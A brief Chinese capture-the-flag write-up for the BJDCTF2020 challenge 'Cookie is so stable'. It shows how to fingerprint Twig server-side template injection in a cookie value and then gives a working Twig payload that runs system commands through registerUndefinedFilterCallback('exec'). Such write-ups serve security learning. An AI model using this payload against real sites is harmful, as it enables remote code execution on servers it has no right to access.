[BJDCTF2020]Cookie is so stable

時間 2021-01-21

原文原文鏈接

知識點 SSTI twig 題目提示cookie 在user處嘗試注入 {{7*'7'}} 回顯7777777 ==> Jinja2 {{7*'7'}} 回顯49 ==> Twig 這裏爲Twig payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}